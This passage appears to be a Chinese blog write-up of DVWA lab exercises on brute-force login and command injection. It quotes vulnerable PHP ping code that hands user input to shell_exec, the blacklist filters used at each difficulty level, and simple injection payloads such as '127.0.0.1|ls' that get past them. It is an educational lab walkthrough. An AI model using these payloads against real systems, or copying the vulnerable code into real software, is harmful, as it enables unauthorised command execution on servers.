<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( <span class="variable">$_POST</span>[ <span class="string">&#x27;Login&#x27;</span> ] ) &amp;&amp; <span class="keyword">isset</span> (<span class="variable">$_POST</span>[<span class="string">&#x27;username&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span> (<span class="variable">$_POST</span>[<span class="string">&#x27;password&#x27;</span>]) ) &#123;</span><br><span class="line">	<span class="comment">// 同High</span></span><br><span class="line">	<span class="title function_ invoke__">checkToken</span>( <span class="variable">$_REQUEST</span>[ <span class="string">&#x27;user_token&#x27;</span> ], <span class="variable">$_SESSION</span>[ <span class="string">&#x27;session_token&#x27;</span> ], <span class="string">&#x27;index.php&#x27;</span> );</span><br><span class="line"></span><br><span class="line">	<span class="comment">//去除输入中的斜杠转义符 + 对用户名进行转义以防止潜在的 SQL 注入攻击</span></span><br><span class="line">	<span class="variable">$user</span> = <span class="variable">$_POST</span>[ <span class="string">&#x27;username&#x27;</span> ];</span><br><span class="line">	<span class="variable">$user</span> = <span class="title function_ invoke__">stripslashes</span>( <span class="variable">$user</span> );</span><br><span class="line">	<span class="variable">$user</span> = ((<span class="keyword">isset</span>(<span class="variable">$GLOBALS</span>[<span class="string">&quot;___mysqli_ston&quot;</span>]) &amp;&amp; <span class="title function_ invoke__">is_object</span>(<span class="variable">$GLOBALS</span>[<span class="string">&quot;___mysqli_ston&quot;</span>])) ? <span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$GLOBALS</span>[<span class="string">&quot;___mysqli_ston&quot;</span>],  <span class="variable">$user</span> ) : ((<span class="title function_ invoke__">trigger_error</span>(<span class="string">&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;</span>, E_USER_ERROR)) ? <span class="string">&quot;&quot;</span> : <span class="string">&quot;&quot;</span>));</span><br><span class="line"></span><br><span class="line">	<span class="comment">//去除输入中的斜杠转义符 + 对用户名进行转义以防止潜在的 SQL 注入攻击</span></span><br><span class="line">	<span class="variable">$pass</span> = <span class="variable">$_POST</span>[ <span class="string">&#x27;password&#x27;</span> ];</span><br><span class="line">	<span class="variable">$pass</span> = <span class="title function_ invoke__">stripslashes</span>( <span class="variable">$pass</span> );</span><br><span class="line">	<span class="variable">$pass</span> = ((<span class="keyword">isset</span>(<span class="variable">$GLOBALS</span>[<span class="string">&quot;___mysqli_ston&quot;</span>]) &amp;&amp; <span class="title function_ invoke__">is_object</span>(<span class="variable">$GLOBALS</span>[<span class="string">&quot;___mysqli_ston&quot;</span>])) ? <span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$GLOBALS</span>[<span class="string">&quot;___mysqli_ston&quot;</span>],  <span class="variable">$pass</span> ) : ((<span class="title function_ invoke__">trigger_error</span>(<span class="string">&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;</span>, E_USER_ERROR)) ? <span class="string">&quot;&quot;</span> : <span class="string">&quot;&quot;</span>));</span><br><span class="line">	<span class="variable">$pass</span> = <span class="title function_ invoke__">md5</span>( <span class="variable">$pass</span> );</span><br><span class="line"></span><br><span class="line">	<span class="comment">//变态，只允许错误3次，超过就会锁定15分组</span></span><br><span class="line">	<span class="variable">$total_failed_login</span> = <span class="number">3</span>; </span><br><span class="line">	<span class="variable">$lockout_time</span>       = <span class="number">15</span>;</span><br><span class="line">	<span class="variable">$account_locked</span>     = <span class="literal">false</span>;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Check the database (Check user information)</span></span><br><span class="line">	<span class="variable">$data</span> = <span class="variable">$db</span>-&gt;<span class="title function_ invoke__">prepare</span>( <span class="string">&#x27;SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;&#x27;</span> );</span><br><span class="line">	<span class="variable">$data</span>-&gt;<span class="title function_ invoke__">bindParam</span>( <span class="string">&#x27;:user&#x27;</span>, <span class="variable">$user</span>, PDO::<span class="variable constant_">PARAM_STR</span> );</span><br><span class="line">	<span class="variable">$data</span>-&gt;<span class="title function_ invoke__">execute</span>();</span><br><span class="line">	<span class="variable">$row</span> = <span class="variable">$data</span>-&gt;<span class="title function_ invoke__">fetch</span>();</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Check to see if the user has been locked out.</span></span><br><span class="line">	<span class="keyword">if</span>( ( <span class="variable">$data</span>-&gt;<span class="title function_ invoke__">rowCount</span>() == <span class="number">1</span> ) &amp;&amp; ( <span class="variable">$row</span>[ <span class="string">&#x27;failed_login&#x27;</span> ] &gt;= <span class="variable">$total_failed_login</span> ) )  &#123;</span><br><span class="line">		<span class="comment">// User locked out.  Note, using this method would allow for user enumeration!</span></span><br><span class="line">		<span class="comment">// Calculate when the user would be allowed to login again</span></span><br><span class="line">		<span class="variable">$last_login</span> = <span class="title function_ invoke__">strtotime</span>( <span class="variable">$row</span>[ <span class="string">&#x27;last_login&#x27;</span> ] );</span><br><span class="line">		<span class="variable">$timeout</span>    = <span class="variable">$last_login</span> + (<span class="variable">$lockout_time</span> * <span class="number">60</span>);</span><br><span class="line">		<span class="variable">$timenow</span>    = <span class="title function_ invoke__">time</span>();</span><br><span class="line">        </span><br><span class="line">		<span class="comment">// Check to see if enough time has passed, if it hasn&#x27;t locked the account</span></span><br><span class="line">		<span class="keyword">if</span>( <span class="variable">$timenow</span> &lt; <span class="variable">$timeout</span> ) &#123;</span><br><span class="line">			<span class="variable">$account_locked</span> = <span class="literal">true</span>;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Check the database (if username matches the password)</span></span><br><span class="line">	<span class="variable">$data</span> = <span class="variable">$db</span>-&gt;<span class="title function_ invoke__">prepare</span>( <span class="string">&#x27;SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;&#x27;</span> );</span><br><span class="line">	<span class="variable">$data</span>-&gt;<span class="title function_ invoke__">bindParam</span>( <span class="string">&#x27;:user&#x27;</span>, <span class="variable">$user</span>, PDO::<span class="variable constant_">PARAM_STR</span>);</span><br><span class="line">	<span class="variable">$data</span>-&gt;<span class="title function_ invoke__">bindParam</span>( <span class="string">&#x27;:password&#x27;</span>, <span class="variable">$pass</span>, PDO::<span class="variable constant_">PARAM_STR</span> );</span><br><span class="line">	<span class="variable">$data</span>-&gt;<span class="title function_ invoke__">execute</span>();</span><br><span class="line">	<span class="variable">$row</span> = <span class="variable">$data</span>-&gt;<span class="title function_ invoke__">fetch</span>();</span><br><span class="line"></span><br><span class="line">	<span class="comment">// If its a valid login...</span></span><br><span class="line">	<span class="keyword">if</span>( ( <span class="variable">$data</span>-&gt;<span class="title function_ invoke__">rowCount</span>() == <span class="number">1</span> ) &amp;&amp; ( <span class="variable">$account_locked</span> == <span class="literal">false</span> ) ) &#123;</span><br><span class="line">		<span class="comment">// Get users details</span></span><br><span class="line">		<span class="variable">$avatar</span>       = <span class="variable">$row</span>[ <span class="string">&#x27;avatar&#x27;</span> ];</span><br><span class="line">		<span class="variable">$failed_login</span> = <span class="variable">$row</span>[ <span class="string">&#x27;failed_login&#x27;</span> ];</span><br><span class="line">		<span class="variable">$last_login</span>   = <span class="variable">$row</span>[ <span class="string">&#x27;last_login&#x27;</span> ];</span><br><span class="line"></span><br><span class="line">		<span class="comment">// Login successful</span></span><br><span class="line">		<span class="variable">$html</span> .= <span class="string">&quot;&lt;p&gt;Welcome to the password protected area &lt;em&gt;<span class="subst">&#123;$user&#125;</span>&lt;/em&gt;&lt;/p&gt;&quot;</span>;</span><br><span class="line">		<span class="variable">$html</span> .= <span class="string">&quot;&lt;img src=\&quot;<span class="subst">&#123;$avatar&#125;</span>\&quot; /&gt;&quot;</span>;</span><br><span class="line"></span><br><span class="line">		<span class="comment">// Had the account been locked out since last login?</span></span><br><span class="line">		<span class="keyword">if</span>( <span class="variable">$failed_login</span> &gt;= <span class="variable">$total_failed_login</span> ) &#123;</span><br><span class="line">			<span class="variable">$html</span> .= <span class="string">&quot;&lt;p&gt;&lt;em&gt;Warning&lt;/em&gt;: Someone might of been brute forcing your account.&lt;/p&gt;&quot;</span>;</span><br><span class="line">			<span class="variable">$html</span> .= <span class="string">&quot;&lt;p&gt;Number of login attempts: &lt;em&gt;<span class="subst">&#123;$failed_login&#125;</span>&lt;/em&gt;.&lt;br /&gt;Last login attempt was at: &lt;em&gt;<span class="subst">&#123;$last_login&#125;</span>&lt;/em&gt;.&lt;/p&gt;&quot;</span>;</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		<span class="comment">// Reset bad login count</span></span><br><span class="line">		<span class="variable">$data</span> = <span class="variable">$db</span>-&gt;<span class="title function_ invoke__">prepare</span>( <span class="string">&#x27;UPDATE users SET failed_login = &quot;0&quot; WHERE user = (:user) LIMIT 1;&#x27;</span> );</span><br><span class="line">		<span class="variable">$data</span>-&gt;<span class="title function_ invoke__">bindParam</span>( <span class="string">&#x27;:user&#x27;</span>, <span class="variable">$user</span>, PDO::<span class="variable constant_">PARAM_STR</span> );</span><br><span class="line">		<span class="variable">$data</span>-&gt;<span class="title function_ invoke__">execute</span>();</span><br><span class="line">	&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">		<span class="comment">// Login failed</span></span><br><span class="line">		<span class="title function_ invoke__">sleep</span>( <span class="title function_ invoke__">rand</span>( <span class="number">2</span>, <span class="number">4</span> ) );</span><br><span class="line"></span><br><span class="line">		<span class="comment">// Give the user some feedback</span></span><br><span class="line">		<span class="variable">$html</span> .= <span class="string">&quot;&lt;pre&gt;&lt;br /&gt;Username and/or password incorrect.&lt;br /&gt;&lt;br/&gt;Alternative, the account has been locked because of too many failed logins.&lt;br /&gt;If this is the case, &lt;em&gt;please try again in <span class="subst">&#123;$lockout_time&#125;</span> minutes&lt;/em&gt;.&lt;/pre&gt;&quot;</span>;</span><br><span class="line"></span><br><span class="line">		<span class="comment">// Update bad login count</span></span><br><span class="line">		<span class="variable">$data</span> = <span class="variable">$db</span>-&gt;<span class="title function_ invoke__">prepare</span>( <span class="string">&#x27;UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;&#x27;</span> );</span><br><span class="line">		<span class="variable">$data</span>-&gt;<span class="title function_ invoke__">bindParam</span>( <span class="string">&#x27;:user&#x27;</span>, <span class="variable">$user</span>, PDO::<span class="variable constant_">PARAM_STR</span> );</span><br><span class="line">		<span class="variable">$data</span>-&gt;<span class="title function_ invoke__">execute</span>();</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Set the last login time</span></span><br><span class="line">	<span class="variable">$data</span> = <span class="variable">$db</span>-&gt;<span class="title function_ invoke__">prepare</span>( <span class="string">&#x27;UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;&#x27;</span> );</span><br><span class="line">	<span class="variable">$data</span>-&gt;<span class="title function_ invoke__">bindParam</span>( <span class="string">&#x27;:user&#x27;</span>, <span class="variable">$user</span>, PDO::<span class="variable constant_">PARAM_STR</span> );</span><br><span class="line">	<span class="variable">$data</span>-&gt;<span class="title function_ invoke__">execute</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Generate Anti-CSRF token</span></span><br><span class="line"><span class="title function_ invoke__">generateSessionToken</span>();</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<h2 id="Add"><a href="#Add" class="headerlink" title="Add"></a>Add</h2><p> 做到这里我想起来了<code>Pikachu靶场</code>的爆破题目，加入了图形验证码机制，然后我就去把这种题目通了，很简单Burp加个验证码识别的插件就可以，就是环境配起来有点小麻烦！</p>
<h1 id="Command-Injection"><a href="#Command-Injection" class="headerlink" title="Command Injection"></a>Command Injection</h1><blockquote>
<p>我认为本质就是考命令执行连接符以及黑名单绕过</p>
</blockquote>
<ul>
<li><a class="link" target="_blank" rel="noopener" href="https://blog.csdn.net/liweibin812/article/details/86235692">出现乱码解决方案<i class="fas fa-external-link-alt"></i></a></li>
</ul>
<blockquote>
<ul>
<li>From OWASP<br>Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.</li>
<li>This attack differs from Code Injection, in that code injection allows the attacker to add their own code that is then executed by the application. In Command Injection, the attacker extends the default functionality of the application, which execute system commands, without the necessity of injecting code.</li>
</ul>
</blockquote>
<ul>
<li>跟<code>pikachu靶场</code>中的<code>RCE</code>类型可以结合在一起学习。</li>
</ul>
<h2 id="Low-1"><a href="#Low-1" class="headerlink" title="Low"></a>Low</h2><p>​    因为有过基础，所以自然就会下列的payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ip &amp; command</span><br><span class="line">ip | command</span><br></pre></td></tr></table></figure>

<p>​    Low难度也是给面子，直接就通了。</p>
<p>​    查看源码探究一下原理：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if( isset( $_POST[ &#x27;Submit&#x27; ]  ) ) </span><br><span class="line">&#123;</span><br><span class="line">	// Get input</span><br><span class="line">	$target = $_REQUEST[ &#x27;ip&#x27; ];</span><br><span class="line"></span><br><span class="line">	// Determine OS and execute the ping command.</span><br><span class="line">	if( stristr( php_uname( &#x27;s&#x27; ), &#x27;Windows NT&#x27; ) ) &#123;</span><br><span class="line">		// Windows</span><br><span class="line">		$cmd = shell_exec( &#x27;ping  &#x27; . $target );</span><br><span class="line">	&#125;</span><br><span class="line">	else &#123;</span><br><span class="line">		// *nix</span><br><span class="line">		$cmd = shell_exec( &#x27;ping  -c 4 &#x27; . $target );</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	// Feedback for the end user</span><br><span class="line">	$html .= &quot;&lt;pre&gt;&#123;$cmd&#125;&lt;/pre&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;!--前端： --&gt;   </span><br><span class="line">&lt;form name=&quot;ping&quot; action=&quot;#&quot; method=&quot;post&quot;&gt;</span><br><span class="line">    &lt;p&gt;</span><br><span class="line">        Enter an IP address:</span><br><span class="line">        &lt;input type=&quot;text&quot; name=&quot;ip&quot; size=&quot;30&quot;&gt;</span><br><span class="line">        &lt;input type=&quot;submit&quot; name=&quot;Submit&quot; value=&quot;Submit&quot;&gt;</span><br><span class="line">    &lt;/p&gt;</span><br><span class="line">&lt;/form&gt;</span><br></pre></td></tr></table></figure>

<p>​    程序执行流程没啥好解释的，直接把我们提交的数据和<code>ping</code>命令连接起来放在执行函数中直接执行了。</p>
<p>补充知识：</p>
<ul>
<li><p>stristr() 函数搜索字符串在另一字符串中的第一次出现。</p>
<p><strong>注释：</strong>该函数是不区分大小写的。如需进行区分大小写的搜索，请使用 <a class="link" target="_blank" rel="noopener" href="https://www.runoob.com/php/func-string-strstr.html">strstr()<i class="fas fa-external-link-alt"></i></a> 函数。</p>
</li>
<li><p><code>php_uname()</code>是PHP的一个内置函数，用于获取服务器的操作系统信息。它返回一个包含操作系统名称的字符串。</p>
<p>该函数可以接受一个可选的参数来指定返回的信息类型，常用的参数如下：</p>
<ul>
<li><code>&#39;s&#39;</code>：返回操作系统的名称（比如 Windows NT、Linux、Darwin等）。</li>
<li><code>&#39;n&#39;</code>：返回网络主机名。</li>
<li><code>&#39;r&#39;</code>：返回操作系统的版本号。</li>
<li><code>&#39;v&#39;</code>：返回操作系统的版本信息。</li>
</ul>
</li>
<li><blockquote>
<p><code>shell_exec()</code>是PHP的一个内置函数，用于执行系统命令，并将命令的输出作为字符串返回。它允许在PHP脚本中执行外部命令或程序。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">string</span> <span class="title function_ invoke__">shell_exec</span>(<span class="keyword">string</span> <span class="variable">$command</span>)</span><br></pre></td></tr></table></figure>

<p>参数<code>$command</code>是要执行的系统命令，可以是任何有效的命令行命令或可执行文件。</p>
<p><code>shell_exec()</code>函数执行指定的命令，并将命令的输出作为字符串返回给调用者。如果命令没有产生任何输出，或者命令执行失败，函数将返回<code>NULL</code>。</p>
</blockquote>
</li>
<li><p><code>ping -c 4</code>中<code>-c 4</code>是ping命令的一个选项，用于指定要发送的回显请求的数量。在这个特定的例子中，<code>-c 4</code>表示要发送4个回显请求。</p>
</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//在PHP中，点号（.）被用作字符串连接运算符，用于将两个字符串连接在一起。</span></span><br><span class="line"><span class="variable">$str1</span> = <span class="string">&quot;Hello&quot;</span>;</span><br><span class="line"><span class="variable">$str2</span> = <span class="string">&quot;world!&quot;</span>;</span><br><span class="line"><span class="variable">$result</span> = <span class="variable">$str1</span> . <span class="variable">$str2</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$result</span>; <span class="comment">// 输出：Hello world!</span></span><br></pre></td></tr></table></figure>

<p><img lazyload alt="image" data-src="D:\Typora\typora-user-images\image-20230708001143708.png"></p>
<blockquote>
<p>Summarid by sqlsec.com</p>
</blockquote>
<table>
<thead>
<tr>
<th>Linux中符号</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>A;B</td>
<td>A 不论正确与否都会执行 B 命令</td>
</tr>
<tr>
<td>A&amp;B</td>
<td>A 后台运行，A 和 B 同时执行</td>
</tr>
<tr>
<td>A&amp;&amp;B</td>
<td>A 执行成功时候才会执行 B 命令</td>
</tr>
<tr>
<td>A|B</td>
<td>A 执行的输出结果，作为 B 命令的参数，A 不论正确与否都会执行 B 命令</td>
</tr>
<tr>
<td>A||B</td>
<td>A 执行失败后才会执行 B 命令</td>
</tr>
</tbody></table>
<blockquote>
<p>在命令执行中A&amp;B与A;B有什么区别？</p>
<p>​    在命令执行中，<code>A&amp;B</code>和<code>A;B</code>表示不同的命令执行方式：</p>
<ol>
<li><code>A&amp;B</code>：表示将命令A放在后台执行，并立即启动命令B。具体来说，命令A将在后台执行，不会阻塞当前命令行或脚本的执行，而命令B将在前台执行。这种方式常用于需要同时执行多个命令，并希望它们在后台并行执行的情况。</li>
<li><code>A;B</code>：表示按顺序执行命令A和命令B。具体来说，命令A将在执行完毕后，才会开始执行命令B。这种方式常用于需要按顺序执行多个命令，并确保前一个命令执行完毕后再执行下一个命令的情况。</li>
</ol>
</blockquote>
<ul>
<li>由于我的靶场搭建在windows环境下,Linux命令需要等效代替：<ul>
<li><code>ls</code>，对应于windows的<code>dir</code></li>
<li><code>pwd</code>，对应于windows的<code>chdir</code></li>
<li><code>cat</code>，对应于windows的<code>type</code></li>
</ul>
</li>
</ul>
<h2 id="Medium-1"><a href="#Medium-1" class="headerlink" title="Medium"></a>Medium</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">----------打得通----------</span><br><span class="line">|</span><br><span class="line">&amp;</span><br><span class="line">----------打不通----------</span><br><span class="line">&amp;&amp;</span><br></pre></td></tr></table></figure>

<p>看看源码，多了这部分:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Set blacklist</span></span><br><span class="line"><span class="variable">$substitutions</span> = <span class="keyword">array</span>(</span><br><span class="line">    <span class="string">&#x27;&amp;&amp;&#x27;</span> =&gt; <span class="string">&#x27;&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;;&#x27;</span>  =&gt; <span class="string">&#x27;&#x27;</span>,</span><br><span class="line">);</span><br></pre></td></tr></table></figure>

<p>相比Low难度，这里使用了黑名单将里面的内容过滤掉了。</p>
<h2 id="High-1"><a href="#High-1" class="headerlink" title="High"></a>High</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">----------打得通----------</span><br><span class="line">|</span><br><span class="line">----------打不通----------</span><br><span class="line">&amp;&amp;</span><br><span class="line">&amp;</span><br><span class="line">----------而且是必须紧挨后面的命令没有空格才可以打通----------</span><br><span class="line">127.0.0.1|ls</span><br></pre></td></tr></table></figure>

<p>查看一下源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Set blacklist</span></span><br><span class="line"><span class="variable">$substitutions</span> = <span class="keyword">array</span>(</span><br><span class="line">	<span class="string">&#x27;&amp;&#x27;</span>  =&gt; <span class="string">&#x27;&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;;&#x27;</span>  =&gt; <span class="string">&#x27;&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;| &#x27;</span> =&gt; <span class="string">&#x27;&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;-&#x27;</span>  =&gt; <span class="string">&#x27;&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;$&#x27;</span>  =&gt; <span class="string">&#x27;&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;(&#x27;</span>  =&gt; <span class="string">&#x27;&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;)&#x27;</span>  =&gt; <span class="string">&#x27;&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;`&#x27;</span>  =&gt; <span class="string">&#x27;&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;||&#x27;</span> =&gt; <span class="string">&#x27;&#x27;</span>,</span><br><span class="line">);</span><br></pre></td></tr></table></figure>

<p>好家伙，给禁用的差不多了，但是注意<code>&#39;| &#39; =&gt; &#39;&#39;</code>中的管道符后面有个空格。</p>
<h2 id="Impossible-1"><a href="#Impossible-1" class="headerlink" title="Impossible"></a>Impossible</h2><p>看看源码学习学习：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( <span class="variable">$_POST</span>[ <span class="string">&#x27;Submit&#x27;</span> ]  ) ) &#123;</span><br><span class="line">	<span class="comment">// Check Anti-CSRF token</span></span><br><span class="line">	<span class="title function_ invoke__">checkToken</span>( <span class="variable">$_REQUEST</span>[ <span class="string">&#x27;user_token&#x27;</span> ], <span class="variable">$_SESSION</span>[ <span class="string">&#x27;session_token&#x27;</span> ], <span class="string">&#x27;index.php&#x27;</span> );</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Get input</span></span><br><span class="line">	<span class="variable">$target</span> = <span class="variable">$_REQUEST</span>[ <span class="string">&#x27;ip&#x27;</span> ];</span><br><span class="line">	<span class="variable">$target</span> = <span class="title function_ invoke__">stripslashes</span>( <span class="variable">$target</span> );</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Split the IP into 4 octects</span></span><br><span class="line">	<span class="variable">$octet</span> = <span class="title function_ invoke__">explode</span>( <span class="string">&quot;.&quot;</span>, <span class="variable">$target</span> );</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Check IF each octet is an integer</span></span><br><span class="line">	<span class="keyword">if</span>( ( <span class="title function_ invoke__">is_numeric</span>( <span class="variable">$octet</span>[<span class="number">0</span>] ) ) &amp;&amp; ( <span class="title function_ invoke__">is_numeric</span>( <span class="variable">$octet</span>[<span class="number">1</span>] ) ) &amp;&amp; ( <span class="title function_ invoke__">is_numeric</span>( <span class="variable">$octet</span>[<span class="number">2</span>] ) ) &amp;&amp; ( <span class="title function_ invoke__">is_numeric</span>( <span class="variable">$octet</span>[<span class="number">3</span>] ) ) &amp;&amp; ( <span class="title function_ invoke__">sizeof</span>( <span class="variable">$octet</span> ) == <span class="number">4</span> ) ) &#123;</span><br><span class="line">		<span class="comment">// If all 4 octets are int&#x27;s put the IP back together.</span></span><br><span class="line">		<span class="variable">$target</span> = <span class="variable">$octet</span>[<span class="number">0</span>] . <span class="string">&#x27;.&#x27;</span> . <span class="variable">$octet</span>[<span class="number">1</span>] . <span class="string">&#x27;.&#x27;</span> . <span class="variable">$octet</span>[<span class="number">2</span>] . <span class="string">&#x27;.&#x27;</span> . <span class="variable">$octet</span>[<span class="number">3</span>];</span><br><span class="line"></span><br><span class="line">		<span class="comment">// Determine OS and execute the ping command.</span></span><br><span class="line">		<span class="keyword">if</span>( <span class="title function_ invoke__">stristr</span>( <span class="title function_ invoke__">php_uname</span>( <span class="string">&#x27;s&#x27;</span> ), <span class="string">&#x27;Windows NT&#x27;</span> ) ) &#123;</span><br><span class="line">			<span class="comment">// Windows</span></span><br><span class="line">			<span class="variable">$cmd</span> = <span class="title function_ invoke__">shell_exec</span>( <span class="string">&#x27;ping  &#x27;</span> . <span class="variable">$target</span> );</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">else</span> &#123;</span><br><span class="line">			<span class="comment">// *nix</span></span><br><span class="line">			<span class="variable">$cmd</span> = <span class="title function_ invoke__">shell_exec</span>( <span class="string">&#x27;ping  -c 4 &#x27;</span> . <span class="variable">$target</span> );</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		<span class="comment">// Feedback for the end user</span></span><br><span class="line">		<span class="variable">$html</span> .= <span class="string">&quot;&lt;pre&gt;<span 